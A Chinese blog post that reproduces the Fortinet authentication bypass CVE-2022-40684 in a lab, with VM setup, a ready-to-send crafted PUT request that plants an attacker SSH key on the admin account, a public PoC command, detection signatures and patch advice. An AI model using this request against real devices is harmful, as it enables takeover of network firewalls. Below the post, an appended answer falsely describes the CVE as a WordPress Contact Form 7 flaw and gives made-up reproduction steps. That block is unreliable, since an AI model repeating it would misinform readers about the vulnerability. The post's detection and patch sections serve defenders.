CVE-2022-40684 Fortinet多个产品身份验证绕过漏洞复现

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

FortiGate虚拟化环境

下载FortiGate-VM:

导入OVF模板:

登录后台:

配置IP:

配置网关:(获取试用授权)

配置DNS:(获取试用授权)

开启Rest API:(方便后期查看攻击日志)

登录web页面:

生成SSH—KEY(后期要使用)

0x06 漏洞复现:

Burp:

修改请求内容:

Xshell连接:

利用POC:

下载:

利用: 

0x07 流量分析:

请求头特征:

响应体特征:

0x08 修复建议:


0x01 声明:

       仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

       Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy 为网站和基于云的应用程序提供安全 Web 网关、安全功能、无与伦比的性能以及最佳用户体验。

0x03 漏洞概述:

        近日,Fortinet修复了一个存在 FortiGate 防火墙和 FortiProxy Web 代理中的身份验证绕过漏洞(CVE-2022-40684),该漏洞可能允许攻击者在易受攻击的设备上执行未经授权的操作,攻击者通过向易受攻击的目标发送特制的 HTTP 或 HTTPS 请求进行绕过身份认证以管理员身份在控制面板中执行任意操作。

0x04 影响版本:

7.0.0 <= FortiOS <= 7.0.6

7.2.0 <= FortiOS <= 7.2.1

7.0.0 <= FortiProxy <= 7.0.6

FortiProxy = 7.2.0

FortiSwitchManager = 7.0.0

FortiSwitchManager = 7.2.0

0x05 环境搭建:

FortiGate虚拟化环境

下载FortiGate-VM:

(https://pan.baidu.com/s/1eCcjGwqfHqklEFfSurTk7Q?pwd=2jx1)

导入OVF模板:

解压FGT_VM64-v7.2.1.F-build1254-FORTINET.out.ovf.zip,选择红框内容导入。

登录后台:

admin 无密码直接回车(会提示修改密码)

配置IP:

config system interface

edit port1

set mode static

set ip 192.168.0.100 255.255.255.0

append allowaccess http

next

end

配置网关:(获取试用授权)

config router static

edit 1

set device port1

set gateway 192.168.0.254

next

end

配置DNS:(获取试用授权)

config system dns

set primary 114.114.114.114

set secondary 235.5.5.5

end

开启Rest API:(方便后期查看攻击日志)

config log setting

set rest-api-set enable

set rest-api-get enable

end

登录web页面:

admin  后台设置的密码

生成SSH—KEY(后期要使用)

0x06 漏洞复现:

Burp:

修改请求内容:

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: 192.168.119.156
User-Agent: Report Runner
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 409
Content-Type: application/json
{"ssh-public-key1":"\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0/ljPV1Bj2kDxivuK7t4Y8MbIYegGvXza7cRwW9uI49eXccQTJr8kRvwUO5Stf01N5wjgZWYXZEAR3kRRCY/UHF6mZT41mCusbJX/IKrRTcmvwWnDysZuFD3YUZuuQvgWiulvOLczUcUXuRwRQj5gUNdFnbB1M/3t0sg2URXPqEqtNxfCQGpeUswpiGPQRCwU6fW0j5GpsX8CtOk/xagvZDRbBTJCqTR61iUxMO/6c82IxQxVb7Fuf6yvwcQhEPcRJ0YPXj3MeCOZQl/n49q7BQeiUqd+4IOrAqoZ08itGHm1iCsgOhacblcV7z5bnf81Z2wJpH5ja626mwxG2ZD/Q==\""}

Xshell连接:

输入用户名admin ,选择 Key。

利用POC:

下载:

https://github.com/horizon3ai/CVE-2022-40684

利用: 

python3 CVE-2022-40684.py -t 192.168.119.156 -u admin -k ~/.ssh/id_rsa.pub

0x07 流量分析:

请求头特征:

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1

User-Agent: Report Runner

Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"

Data:{"ssh-public-key1": "\"ssh-rsa xxxx\""}

响应体特征:

HTTP/1.1 500 Internal Server Error date: 

"cli_error":"SSH key is good.

0x08 修复建议:

官方已经针对漏洞发布了安全更新,用户可升级至安全版本:

使用 7.0.0 <= FortiOS <= 7.0.6 的用户升级至 7.0.7 版本

使用 7.2.0 <= FortiOS <= 7.2.1 的用户升级至 7.2.2 版本

使用 7.0.0 <= FortiProxy <= 7.0.6 的用户升级至 7.0.7 版本

使用 FortiProxy = 7.2.0 的用户升级至 7.2.1 版本

下载地址如下:

https://docs.fortinet.com/document/fortigate/7.2.2/fortios-release-notes/832438/upgrade-information

https://docs.fortinet.com/document/fortiproxy/7.2.1/release-notes/587449/product-integration-and-support

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CVE-2022-40684是一个与WordPress插件Contact Form 7有关的安全漏洞。该漏洞可能允许攻击者通过恶意构造的特定请求,绕过验证机制并执行远程代码。 要复现CVE-2022-40684,您可以按照以下步骤进行操作: 1. 确保您在本地或测试环境中安装了WordPress,并且已经安装了Contact Form 7插件。 2. 登录WordPress管理后台,并激活Contact Form 7插件。 3. 创建一个新的Contact Form 7表单,并添加一些表单字段,例如名称和电子邮件字段。 4. 打开某个文件编辑器,例如Notepad++或者Sublime Text,并创建一个新的PHP文件。 5. 在PHP文件中编写以下恶意代码: ``` <?php // 攻击者的恶意代码,用于复现漏洞 echo "漏洞复现成功!"; ?> ``` 6. 将PHP文件保存为任意名称,例如exploit.php。 7. 回到WordPress的插件管理页面,找到并激活File Manager Advanced插件。 8. 在File Manager Advanced插件的设置中,启用文件编辑功能。 9. 打开File Manager Advanced插件,并找到主题目录下的functions.php文件。 10. 将以下恶意代码添加到functions.php文件的任意位置: ``` include_once('exploit.php'); ``` 11. 保存functions.php文件,并刷新WordPress前台页面。 12. 访问包含Contact Form 7表单的页面,并填写表单字段。 13. 提交表单后,您将看到"漏洞复现成功!"的输出,表示成功复现CVE-2022-40684漏洞。 请注意,上述步骤仅用于演示CVE-2022-40684漏洞复现过程。在实际环境中,请遵循安全最佳实践,不要滥用或利用此漏洞来进行非法活动。及时更新和修复软件以确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Evan Kang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值